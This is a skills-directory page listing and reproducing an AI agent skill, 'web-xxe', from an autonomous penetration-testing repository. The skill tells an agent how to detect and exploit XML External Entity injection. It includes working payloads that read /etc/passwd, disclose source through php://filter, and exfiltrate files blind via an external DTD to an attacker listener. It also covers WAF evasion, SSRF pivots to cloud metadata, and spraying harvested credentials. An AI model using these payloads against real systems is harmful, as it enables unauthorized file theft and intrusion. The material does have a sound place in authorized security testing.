Agent skill

Web Xxe

by s0ld13rr in s0ld13rr/pentestcode

XML External Entity injection detection→file-read/SSRF→proof for web apps.

MITAuto-check passedDocuments & Office

Install Web Xxe

skills CLI
$ npx skills add s0ld13rr/pentestcode --skill web-xxe -a claude-code

Project install by default; add -g for ~/.claude/skills/.

GitHub CLI
$ gh skill install s0ld13rr/pentestcode web-xxe --agent claude-code

Project scope by default; add --scope user for a personal install. Needs GitHub CLI 2.90.0 or later (public preview).

Manual copy
$ git clone --depth 1 https://github.com/s0ld13rr/pentestcode.git skills-src && mkdir -p .claude/skills && cp -r skills-src/skills/web/xxe .claude/skills/web-xxe && rm -rf skills-src

Use ~/.claude/skills/ instead of .claude/skills for a personal install. The folder must contain SKILL.md.

Claude Code skills documentation · loads skills from .claude/skills/

Facts

Skill name
web-xxe
GitHub stars
827
Token cost
~585 tokens
SKILL.md length
190 words
Files
1
Skills in repo
9
Repo updated
First seen
Licence
MIT

At a glance

XML External Entity injection detection→file-read/SSRF→proof for web apps.

  • The app parses XML you influence - SOAP/REST XML bodies
  • SKILL.md covers When this fires, Detect, Decide and Exploit → PROVE IMPACT, plus 2 more sections
  • Instructions only: no scripts, shell commands, URLs or credentials in SKILL.md
  • DOCX/XLSX/SVG/XML file uploads

What it does

Web Xxe is an agent skill from s0ld13rr/pentestcode. XML External Entity injection detection→file-read/SSRF→proof for web apps. Use when the app parses XML you influence - SOAP/REST XML bodies, SAML, RSS/Atom, DOCX/XLSX/SVG/XML file uploads, sitemap import, SVG avatars. Triggers - Content-Type application/xml or text/xml, <?xml, SOAPAction header, SAMLResponse, .docx/.svg upload, XML parse error.

Its SKILL.md is about 590 tokens, which your agent loads only when the skill is triggered. It is a single SKILL.md file with no bundled scripts.

It sits in Documents & Office, covering Word documents, Excel spreadsheets and Web application vulnerabilities. It works with Microsoft Word and Microsoft Excel. The repository describes itself as: PentestCode - Multi-agent AI penetration testing system with persistent engagement state, strategic coordination, and parallel autonomous operations. The licence is MIT.

When your agent uses it

  • The app parses XML you influence - SOAP/REST XML bodies
  • DOCX/XLSX/SVG/XML file uploads
  • - Content-Type application/xml
  • SOAPAction header

Example prompts

  • “/web-xxe”

What it can do on your machine

Read from SKILL.md and the folder at commit 6053679. It shows what the files ask for, not the result of running them.

  • Tool permissions

    Pre-approves nothing: there is no allowed-tools line, so your agent's usual permission prompts apply.

    From allowed-tools in the SKILL.md frontmatter.

  • Runs code

    No scripts in the folder and no shell commands in SKILL.md (its code samples are xml).

    From the folder's file list and the shell code blocks in SKILL.md.

  • Network

    No URLs in SKILL.md.

    From URLs in SKILL.md, links to its own repository left out.

  • Credentials

    Names no API keys, tokens, secrets or passwords.

    From names ending in _API_KEY, _TOKEN, _SECRET, _KEY or _PASSWORD in SKILL.md.

Context cost

Web Xxe loads about 585 tokens when it runs. Until then it costs about 89 tokens; SKILL.md has 190 words of instructions outside code blocks.

Always · name and description, kept in context so the agent knows when to use it
~89
When it runs · the whole SKILL.md, loaded when a task matches
~585

Estimates: characters ÷ 4, the usual rule of thumb; real counts depend on the model's tokenizer. Scripts and assets cost tokens only if the agent reads them.

Safety

Auto-check passed

The automated check found no risky patterns in SKILL.md.

Automated static check — not a guarantee. Review scripts before installing. It scans the text of SKILL.md for risky patterns (piping downloads into a shell, reading credential files, hidden Unicode, destructive commands); files beside SKILL.md are not scanned.

SKILL.md

The full file from s0ld13rr/pentestcode at commit 6053679, republished under its MIT licence (© s0ld13rr). 190 words, ~585 tokens.

Download SKILL.mdSave it as .claude/skills/web-xxe/SKILL.md (or your agent's skills folder).
name
web-xxe
description
XML External Entity injection detection→file-read/SSRF→proof for web apps. Use when the app parses XML you influence - SOAP/REST XML bodies, SAML, RSS/Atom, DOCX/XLSX/SVG/XML file uploads, sitemap import, SVG avatars. Triggers - Content-Type application/xml or text/xml, <?xml, SOAPAction header, SAMLResponse, .docx/.svg upload, XML parse error.
tags
vuln_assess, exploitation

XXE (XML External Entity)

When this fires

The server parses attacker-influenced XML: XML/SOAP APIs, SAML, RSS import, or office/SVG file uploads (DOCX/XLSX are zipped XML — inject into word/document.xml etc.).

Detect

xml
<?xml version="1.0"?>
<!DOCTYPE r [<!ENTITY x SYSTEM "file:///etc/passwd">]>
<root>&x;</root>

If /etc/passwd comes back in the response → classic in-band XXE. No reflection → test blind (OOB) below.

Decide

  • Entity value reflected in a response field → in-band file read.
  • Not reflected but parser fetches your DTD → blind XXE → OOB exfil via external DTD.
  • Non-printable/multiline files break the parser → use php://filter base64 wrapper (PHP) to read source.
  • Entity fetches arbitrary URLs → XXE→SSRF (hit internal services / cloud metadata; see web-ssrf).

Exploit → PROVE IMPACT

xml
<!-- source disclosure (PHP): -->
<!DOCTYPE r [<!ENTITY x SYSTEM "php://filter/convert.base64-encode/resource=index.php">]><root>&x;</root>
<!-- blind OOB exfil (host evil.dtd on your listener): -->
<!DOCTYPE r [<!ENTITY % p SYSTEM "http://<OOB>/evil.dtd"> %p;]>
<!-- evil.dtd: -->
<!ENTITY % f SYSTEM "file:///etc/passwd">
<!ENTITY % e "<!ENTITY &#x25; x SYSTEM 'http://<OOB>/?d=%f;'>"> %e; %x;

Proof required: contents of a server file (/etc/passwd, app source, a secret) or a provable OOB fetch of a file's bytes. Read creds → add_credential + cred_spray.

Tooling

nuclei -tags xxe; for DOCX/XLSX: unzip, inject into the XML part, re-zip, upload. Host the OOB DTD on your attacker box (internal targets: transfer the listener inward).

False positives / pitfalls

  • Parser has external entities disabled → in-band fails; blind/parameter-entity variant may still work; if the DTD isn't fetched at all, it's patched.
  • WAF blocks <!DOCTYPE> → try UTF-16/UTF-7 encoding, or a nested/parameter-entity form.
  • Reflected-but-not-parsed input = not XXE.

© s0ld13rr, MIT. Rendered from Markdown: HTML in the file is shown as text, images as links, and headings moved down two levels. Raw file

Files

Just SKILL.md in skills/web/xxe of s0ld13rr/pentestcode.

Open the folder on GitHubat commit 6053679

Compare with similar skills

Web Xxe next to the 5 skills that share the most tags, products or categories with it. Stars are the repository's; “used in” counts other GitHub owners with a copy.

Web Xxe compared with similar skills
SkillStarsUsed inTokensAuto-checkLicenceRepo updated
Web Xxe this skills0ld13rr/pentestcode827—~585Automated safety check: PassMIT
MarkitdownImCa0/just-laws78114 repos~3.2kAutomated safety check: NotesMIT
Docx4jplutext/docx4j2.4k—~2.5kAutomated safety check: PassNone
Cyber Pptcrazyykhllc-bit/CyberPPT1.8k—~10kAutomated safety check: PassMIT
Markitshift-labs-ai/markit1.3k—~299Automated safety check: PassMIT
Markitdownjimmc414/Kosmos5942 repos~1.7kAutomated safety check: PassNone

Similar skills

  • Markitdown

    ImCa0/just-laws

    Convert files and office documents to Markdown. An agent skill from ImCa0/just-laws.

    781 GitHub starsUsed in 14 repos~3.2k tokens
    Documents & OfficeAuto-check: notes
  • Docx4j

    plutext/docx4j

    A skill your agent uses when writing Java code that creates, reads or edits Word (.docx), PowerPoint (.pptx) or Excel (.xlsx) files with docx4j — including generating documents, editing existing…

    2.4k GitHub stars~2.5k tokensUpdated yesterday
    Documents & OfficeAuto-check passed
  • Cyber Ppt

    crazyykhllc-bit/CyberPPT

    当用户需要把 DOCX、PDF、TXT、XLSX、研究报告、业务材料或原始数据转成高密度、可编辑、咨询风格 PPTX 时使用;也适用于需要 SCR 论证、视觉风格探索、详细图表和渲染质检的 PPT。

    1.8k GitHub stars~10k tokensUpdated 2 mo ago
    Documents & OfficeAuto-check passed
  • Markit

    shift-labs-ai/markit

    Convert files and URLs to Markdown. An agent skill from shift-labs-ai/markit.

    1.3k GitHub stars~299 tokensUpdated 1 mo ago
    Documents & OfficeAuto-check passed
  • Markitdown

    jimmc414/Kosmos

    Convert various file formats (PDF, Office documents, images, audio, web content, structured data) to Markdown optimized for LLM processing.

    594 GitHub starsUsed in 2 repos~1.7k tokens
    Documents & OfficeAuto-check passed
  • Liteparse

    bastani-inc/atomic

    A skill your agent uses whenever a task involves a document file (PDF, DOCX, PPTX, XLSX, or image) and you need to read it or pull text, tables, or specific values out of it — to answer a question…

    846 GitHub stars~1.4k tokensUpdated today
    Documents & OfficeAuto-check passed

More from s0ld13rr/pentestcode

All 9 skills in this repo
  • Svc Docker K8s

    s0ld13rr/pentestcode

    Docker/Kubernetes attack techniques — exposed API abuse, container escape, RBAC/privileged-pod issues, secret theft.

    827 GitHub stars~648 tokensUpdated 6 days ago
    Auto-check passed
  • Svc Mobile Android

    s0ld13rr/pentestcode

    Android APK static analysis — OWASP Mobile Top 10, Retrofit API audit, transport security, smali reading, component export, auth flow analysis.

    827 GitHub stars~2.9k tokensUpdated 6 days ago
    Auto-check passed
  • Web Lfi Traversal

    s0ld13rr/pentestcode

    Path traversal / Local File Inclusion detection→file-read→RCE for web apps.

    827 GitHub stars~602 tokensUpdated 6 days ago
    Auto-check: notes
  • Web Sqli

    s0ld13rr/pentestcode

    SQL injection detection→exploitation→proof for web apps and APIs.

    827 GitHub stars~710 tokensUpdated 6 days ago
    Auto-check passed
  • Web Ssti

    s0ld13rr/pentestcode

    Server-Side Template Injection detection→engine-fingerprint→RCE for web apps.

    827 GitHub stars~621 tokensUpdated 6 days ago
    Auto-check passed
  • Svc Database

    s0ld13rr/pentestcode

    Database RCE paths — UDF, xpcmdshell, COPY TO PROGRAM, Redis key write.

    827 GitHub stars~379 tokensUpdated 6 days ago
    Auto-check passed

Questions about Web Xxe

What does Web Xxe do?

XML External Entity injection detection→file-read/SSRF→proof for web apps. Web Xxe is an agent skill from s0ld13rr/pentestcode. XML External Entity injection detection→file-read/SSRF→proof for web apps.

When should I use Web Xxe?

Web Xxe fits situations like: the app parses XML you influence - SOAP/REST XML bodies; DOCX/XLSX/SVG/XML file uploads; - Content-Type application/xml; SOAPAction header.

How do I install Web Xxe in Claude Code?

Run `npx skills add s0ld13rr/pentestcode --skill web-xxe -a claude-code`. Or copy the skill folder (skills/web/xxe in s0ld13rr/pentestcode) into .claude/skills/web-xxe in your project. Claude Code loads it when a task matches its description.

How do I install Web Xxe in Codex?

Run `npx skills add s0ld13rr/pentestcode --skill web-xxe -a codex`. Or copy the skill folder (skills/web/xxe in s0ld13rr/pentestcode) into .agents/skills/web-xxe in your project. Codex loads it when a task matches its description.

Can I use Web Xxe in Cursor, Gemini CLI or GitHub Copilot?

Cursor, Gemini CLI, GitHub Copilot and OpenCode also load SKILL.md folders. With the skills CLI, run `npx skills add s0ld13rr/pentestcode --skill web-xxe -a cursor` (or -a gemini-cli, github-copilot or opencode for the others). To copy it by hand, put the folder in .cursor/skills/web-xxe, .gemini/skills/web-xxe, .github/skills/web-xxe and .opencode/skills/web-xxe in your project.

What does Web Xxe need to run?

SKILL.md names no scripts, command-line tools or credentials: Web Xxe is instructions for the agent only.

Does Web Xxe access the network?

SKILL.md contains no URLs. Any network use would come from the scripts or tools the agent runs. This is read from the text; nothing was executed.

Is Web Xxe safe to install?

Our automated static check of SKILL.md found no risky patterns, such as piping downloads into a shell, reading credential files or hidden Unicode. It is not a guarantee. Review the folder before installing.

What licence does Web Xxe use?

Web Xxe is published under the MIT licence (the repository's licence). It allows redistribution, so the full SKILL.md is shown on this page.

How many tokens does Web Xxe use?

About 585 tokens (SKILL.md is roughly 2.3k characters). Agents keep only the skill's name and description in context until a task matches; then they load SKILL.md in full.

What are the alternatives to Web Xxe?

Skills that share tags, products or a category with Web Xxe: Markitdown (ImCa0/just-laws, 781 stars), Docx4j (plutext/docx4j, 2.4k stars), Cyber Ppt (crazyykhllc-bit/CyberPPT, 1.8k stars) and Markit (shift-labs-ai/markit, 1.3k stars). The comparison table on this page puts their stars, adoption, token cost, safety result and licence side by side.

Who maintains Web Xxe?

s0ld13rr (a GitHub user) maintains it in s0ld13rr/pentestcode, which has 827 GitHub stars. The repository holds 9 skills in this directory. The repository was last updated on October 2, 2026.

Source: s0ld13rr/pentestcode on GitHub. Facts on this page come from the repository at the commit we read; the author's words are quoted as theirs.